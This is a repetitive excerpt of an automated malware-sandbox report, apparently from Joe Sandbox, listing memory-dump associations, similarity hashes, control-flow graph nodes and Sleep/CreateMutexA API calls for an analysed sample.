                                                                                                                                                                                                        • Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: 747496e51e6b226c83b5e960d9340fc175e36b009a9018ce26361152e0a8e006
                                                                                                                                                                                                        • Instruction ID: 8c57bd98c48a44f61196acfdfdae6833ffec21ea400da4c452764d7ce779c393
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 747496e51e6b226c83b5e960d9340fc175e36b009a9018ce26361152e0a8e006
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 323146317102009BEB08DB68DD8C7ECB762DF8A320F20463CE124AB7D6DB7589818751

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 601 b9fa9-b9fc9 605 b9fcb-b9fd7 601->605 606 b9ff7-ba013 601->606 607 b9fd9-b9fe7 605->607 608 b9fed-b9ff4 call cd593 605->608 609 ba041-ba060 606->609 610 ba015-ba021 606->610 607->608 611 ba860 607->611 608->606 615 ba08e-ba846 call c7f30 609->615 616 ba062-ba06e 609->616 613 ba023-ba031 610->613 614 ba037-ba03e call cd593 610->614 618 ba883-ba8c4 Sleep CreateMutexA 611->618 619 ba860 call e6b9a 611->619 613->611 613->614 614->609 622 ba070-ba07e 616->622 623 ba084-ba08b call cd593 616->623 631 ba8d7-ba8d8 618->631 632 ba8c6-ba8c8 618->632 619->618 622->611 622->623 623->615 632->631 633 ba8ca-ba8d5 632->633 633->631
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 000BA893
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: 8cf605fb256697353bc1daea569c1f2745f47d547369115bb788700b04dbfce6
                                                                                                                                                                                                        • Instruction ID: 77fc73c1bd8609892a22c94a4b53b476d37c02072bb0044cd7c06fc32383597e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8cf605fb256697353bc1daea569c1f2745f47d547369115bb788700b04dbfce6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75314A317242449BEB18DB78DD88BEDB7729F86310F248238E114EB6D5CBB599818752

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 635 ba0de-ba0fe 639 ba12c-ba148 635->639 640 ba100-ba10c 635->640 641 ba14a-ba156 639->641 642 ba176-ba195 639->642 643 ba10e-ba11c 640->643 644 ba122-ba129 call cd593 640->644 645 ba158-ba166 641->645 646 ba16c-ba173 call cd593 641->646 647 ba1c3-ba846 call c7f30 642->647 648 ba197-ba1a3 642->648 643->644 649 ba865-ba8c4 call e6b9a Sleep CreateMutexA 643->649 644->639 645->646 645->649 646->642 653 ba1b9-ba1c0 call cd593 648->653 654 ba1a5-ba1b3 648->654 665 ba8d7-ba8d8 649->665 666 ba8c6-ba8c8 649->666 653->647 654->649 654->653 666->665 667 ba8ca-ba8d5 666->667 667->665
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 000BA893
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496332782.000000000034C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496403043.0000000000355000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000359000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496487974.0000000000376000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496678595.00000000003A3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496755725.00000000003A4000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496825453.00000000003AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496897073.00000000003AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496976743.00000000003BB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269497051183.00000000003BC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0000_0d47c4c34f.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: 293d0b781373d399612048b01d5eff91e2fe0bba2f1bf601c9407671144850a4
                                                                                                                                                                                                        • Instruction ID: bbf7f56ba7ed6ff2c02d8104cb7679c079896a8deccda477f3402415eeddef9b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 293d0b781373d399612048b01d5eff91e2fe0bba2f1bf601c9407671144850a4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5312831714200DBEB189B7CDD8CBEDB6629F86310F24863CE114AB6D5DB7599818752

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 669 ba348-ba368 673 ba36a-ba376 669->673 674 ba396-ba3b2 669->674 675 ba378-ba386 673->675 676 ba38c-ba393 call cd593 673->676 677 ba3e0-ba3ff 674->677 678 ba3b4-ba3c0 674->678 675->676 681 ba86f-ba87e call e6b9a * 3 675->681 676->674 679 ba42d-ba846 call c7f30 677->679 680 ba401-ba40d 677->680 683 ba3c2-ba3d0 678->683 684 ba3d6-ba3dd call cd593 678->684 685 ba40f-ba41d 680->685 686 ba423-ba42a call cd593 680->686 702 ba883-ba8c4 Sleep CreateMutexA 681->702 703 ba87e call e6b9a 681->703 683->681 683->684 684->677 685->681 685->686 686->679 705 ba8d7-ba8d8 702->705 706 ba8c6-ba8c8 702->706 703->702 706->705 707 ba8ca-ba8d5 706->707 707->705
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 000BA893
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00113224), ref: 000BA8B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.269493384528.00000000000B1000.00000040.00000001.01000000.00000009.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493336767.00000000000B0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493384528.0000000000112000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493542699.0000000000119000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493601454.000000000011B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493651844.0000000000127000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269493973150.0000000000282000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494030541.0000000000284000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.0000000000293000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494085729.00000000002A0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494189625.00000000002A5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494237891.00000000002A7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494283578.00000000002A8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494356681.00000000002A9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494446907.00000000002BB000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494529322.00000000002BD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494614921.00000000002CF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494677039.00000000002D0000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494751951.00000000002D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494828912.00000000002E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494916130.00000000002F6000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269494992643.00000000002F8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495075911.00000000002F9000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495152037.0000000000300000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495224243.000000000030D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495296054.0000000000311000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495374226.000000000031A000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495471030.000000000031B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495545830.000000000031C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495613757.000000000031F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495680316.0000000000327000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495753398.0000000000328000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495832475.0000000000329000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495905769.000000000032B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269495977278.000000000032C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496049614.0000000000330000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496125662.0000000000339000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496192237.000000000033C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.269496267370.000000000034A000.00000080.00000001.01000000.00000009.sdmpDownload File
